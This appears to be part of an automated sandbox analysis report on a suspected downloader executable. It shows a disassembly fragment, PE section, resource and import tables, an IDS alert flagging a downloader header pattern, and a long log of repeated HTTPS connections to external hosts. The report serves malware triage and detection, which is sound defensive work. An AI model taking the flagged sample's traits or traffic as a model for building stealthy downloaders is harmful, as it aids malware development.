                                                                            call dword ptr [00407098h]
                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                            cmp byte ptr [esi], bl
                                                                            jne 00007F2D450B357Dh
                                                                            push 0000000Ah
                                                                            call 00007F2D450B662Eh
                                                                            push 00000008h
                                                                            call 00007F2D450B6627h
                                                                            push 00000006h
                                                                            mov dword ptr [00423704h], eax
                                                                            call 00007F2D450B661Bh
                                                                            cmp eax, ebx
                                                                            je 00007F2D450B35A1h
                                                                            push 0000001Eh
                                                                            call eax
                                                                            test eax, eax
                                                                            je 00007F2D450B3599h
                                                                            or byte ptr [0042370Fh], 00000040h
                                                                            push ebp
                                                                            call dword ptr [00407044h]
                                                                            push ebx
                                                                            call dword ptr [00407288h]
                                                                            mov dword ptr [004237D8h], eax
                                                                            push ebx
                                                                            lea eax, dword ptr [esp+38h]
                                                                            push 00000160h
                                                                            push eax
                                                                            push ebx
                                                                            push 0041ECC8h
                                                                            call dword ptr [00407178h]
                                                                            push 00409188h
                                                                            Programming Language:
                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x330000x15788.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x5ed20x60009112619c91f32f6f8e4096e108712ebeFalse0.6629638671875data6.442176588686321IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x70000x12480x14001c9a524313c13059919ecf8195d205beFalse0.4275390625data5.007650149182371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x90000x1a8180x400458aeaedc3eabb1f26ec1bbd666017aeFalse0.6396484375data5.13585559284969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .ndata0x240000xf0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x330000x157880x1580040497017b2a1d5e01ad2b917ac12d1ebFalse0.2589821039244186data4.486367209516884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x332c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.21990713356204897
                                                                            RT_ICON0x43af00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.35072614107883815
                                                                            RT_ICON0x460980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.39094746716697937
                                                                            RT_ICON0x471400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.48811475409836064
                                                                            RT_ICON0x47ac80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5523049645390071
                                                                            RT_DIALOG0x47f300x100dataEnglishUnited States0.5234375
                                                                            RT_DIALOG0x480300x11cdataEnglishUnited States0.6056338028169014
                                                                            RT_DIALOG0x481500xc4dataEnglishUnited States0.5918367346938775
                                                                            RT_DIALOG0x482180x60dataEnglishUnited States0.7291666666666666
                                                                            RT_GROUP_ICON0x482780x4cdataEnglishUnited States0.8157894736842105
                                                                            RT_VERSION0x482c80x180dataEnglishUnited States0.5859375
                                                                            RT_MANIFEST0x484480x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                            DLLImport
                                                                            KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                            USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                            SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                            ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-03T16:43:50.010223+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949709172.217.19.174443TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 3, 2024 16:43:47.279522896 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:47.279575109 CET44349709172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:47.279665947 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:47.292957067 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:47.292999029 CET44349709172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:49.088512897 CET44349709172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:49.088618040 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:49.089355946 CET44349709172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:49.089418888 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:49.179348946 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:49.179380894 CET44349709172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:49.179785013 CET44349709172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:49.179833889 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:49.183219910 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:49.223330021 CET44349709172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:50.010217905 CET44349709172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:50.010442019 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:50.010467052 CET44349709172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:50.010591984 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:50.011008024 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:50.011030912 CET44349709172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:50.011117935 CET49709443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:50.267216921 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:50.267265081 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:50.267369032 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:50.267718077 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:50.267730951 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:51.972306013 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:51.972426891 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:51.976845980 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:51.976888895 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:51.977178097 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:51.977279902 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:51.977626085 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:52.023344040 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:52.926780939 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:52.926940918 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:52.926964998 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:52.927038908 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:52.927529097 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:52.927596092 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:52.927783966 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:52.927833080 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:52.927843094 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:52.927886963 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:52.942373991 CET49710443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:52.942398071 CET44349710142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:53.062191963 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:53.062244892 CET44349711172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:53.062413931 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:53.062766075 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:53.062777996 CET44349711172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:54.950972080 CET44349711172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:54.951081038 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:54.951767921 CET44349711172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:54.951838970 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:54.954103947 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:54.954122066 CET44349711172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:54.954376936 CET44349711172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:54.954428911 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:54.954955101 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:54.999336004 CET44349711172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:55.880552053 CET44349711172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:55.880697012 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:55.880711079 CET44349711172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:55.880754948 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:55.880903959 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:55.880950928 CET44349711172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:55.881057024 CET49711443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:55.891484022 CET49712443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:55.891542912 CET44349712142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:55.891630888 CET49712443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:55.891940117 CET49712443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:55.891951084 CET44349712142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:57.639349937 CET44349712142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:57.639460087 CET49712443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:57.640193939 CET49712443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:57.640203953 CET44349712142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:57.640398979 CET49712443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:57.640403986 CET44349712142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:58.597474098 CET44349712142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:58.597609997 CET49712443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:58.597637892 CET44349712142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:58.597816944 CET49712443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:58.598123074 CET44349712142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:58.598190069 CET49712443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:58.598190069 CET44349712142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:58.598258018 CET49712443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:58.599096060 CET49712443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:43:58.599117994 CET44349712142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:43:58.749149084 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:58.749196053 CET44349714172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:43:58.749269962 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:58.760560036 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:43:58.760596037 CET44349714172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:00.516244888 CET44349714172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:00.516472101 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:00.516994953 CET44349714172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:00.517060041 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:00.519001007 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:00.519013882 CET44349714172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:00.519256115 CET44349714172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:00.519306898 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:00.519738913 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:00.567338943 CET44349714172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:01.426670074 CET44349714172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:01.426794052 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:01.426815987 CET44349714172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:01.426892042 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:01.427006960 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:01.427082062 CET44349714172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:01.427164078 CET49714443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:01.437412977 CET49715443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:01.437464952 CET44349715142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:01.437573910 CET49715443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:01.437891960 CET49715443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:01.437906027 CET44349715142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:03.234215021 CET44349715142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:03.234369040 CET49715443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:03.257872105 CET49715443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:03.257882118 CET44349715142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:03.258059025 CET49715443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:03.258064985 CET44349715142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:04.214066029 CET44349715142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:04.214364052 CET49715443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:04.214812994 CET44349715142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:04.214879990 CET49715443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:04.215167046 CET49715443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:04.215209961 CET44349715142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:04.215270996 CET49715443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:04.343247890 CET49716443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:04.343305111 CET44349716172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:04.343400955 CET49716443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:04.343759060 CET49716443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:04.343774080 CET44349716172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:06.038901091 CET44349716172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:06.039170980 CET49716443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:06.039722919 CET44349716172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:06.039779902 CET49716443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:06.050128937 CET49716443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:06.050148010 CET44349716172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:06.050430059 CET44349716172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:06.050498962 CET49716443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:06.050839901 CET49716443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:06.095335960 CET44349716172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:06.949820995 CET44349716172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:06.949906111 CET44349716172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:06.949924946 CET49716443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:06.950263023 CET49716443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:06.951102018 CET49716443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:06.951117992 CET44349716172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:06.969445944 CET49717443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:06.969497919 CET44349717142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:06.969572067 CET49717443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:06.969825029 CET49717443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:06.969836950 CET44349717142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:08.709683895 CET44349717142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:08.709764004 CET49717443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:08.742424965 CET49717443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:08.742443085 CET44349717142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:08.742755890 CET44349717142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:08.742805958 CET49717443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:08.750181913 CET49717443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:08.791321993 CET44349717142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:09.692127943 CET44349717142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:09.692229033 CET49717443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:09.692574024 CET44349717142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:09.692625999 CET49717443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:09.693082094 CET49717443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:09.693119049 CET44349717142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:09.693175077 CET49717443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:09.811568022 CET49718443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:09.811624050 CET44349718172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:09.811698914 CET49718443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:09.811942101 CET49718443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:09.811954021 CET44349718172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:11.553297997 CET44349718172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:11.553404093 CET49718443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:11.553858995 CET49718443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:11.553875923 CET44349718172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:11.554075956 CET49718443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:11.554083109 CET44349718172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:12.469752073 CET44349718172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:12.469875097 CET49718443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:12.469892979 CET44349718172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:12.469939947 CET49718443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:12.469984055 CET49718443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:12.470062017 CET44349718172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:12.470122099 CET49718443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:12.477447033 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:12.477497101 CET44349719142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:12.477577925 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:12.477782965 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:12.477799892 CET44349719142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:14.273379087 CET44349719142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:14.273595095 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:14.275922060 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:14.275933027 CET44349719142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:14.276973009 CET44349719142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:14.277041912 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:14.277436018 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:14.323323965 CET44349719142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:15.249146938 CET44349719142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:15.249291897 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:15.249852896 CET44349719142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:15.249907970 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:15.249953985 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:15.250020981 CET44349719142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:15.250082016 CET44349719142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:15.250108004 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:15.250145912 CET49719443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:15.373684883 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:15.373744965 CET44349720172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:15.373846054 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:15.374078989 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:15.374089956 CET44349720172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:17.072827101 CET44349720172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:17.073050022 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:17.073612928 CET44349720172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:17.073667049 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:17.076267004 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:17.076281071 CET44349720172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:17.076546907 CET44349720172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:17.078547955 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:17.078831911 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:17.123330116 CET44349720172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:17.986525059 CET44349720172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:17.986736059 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:17.986766100 CET44349720172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:17.986828089 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:17.986871958 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:17.986907959 CET44349720172.217.19.174192.168.2.9
                                                                            Dec 3, 2024 16:44:17.986968040 CET49720443192.168.2.9172.217.19.174
                                                                            Dec 3, 2024 16:44:18.004483938 CET49721443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:18.004520893 CET44349721142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:18.004595995 CET49721443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:18.004983902 CET49721443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:18.004993916 CET44349721142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:19.742727995 CET44349721142.250.181.1192.168.2.9
                                                                            Dec 3, 2024 16:44:19.742794037 CET49721443192.168.2.9142.250.181.1
                                                                            Dec 3, 2024 16:44:19.744600058 CET49721443192.168.2.9142.250.181.1
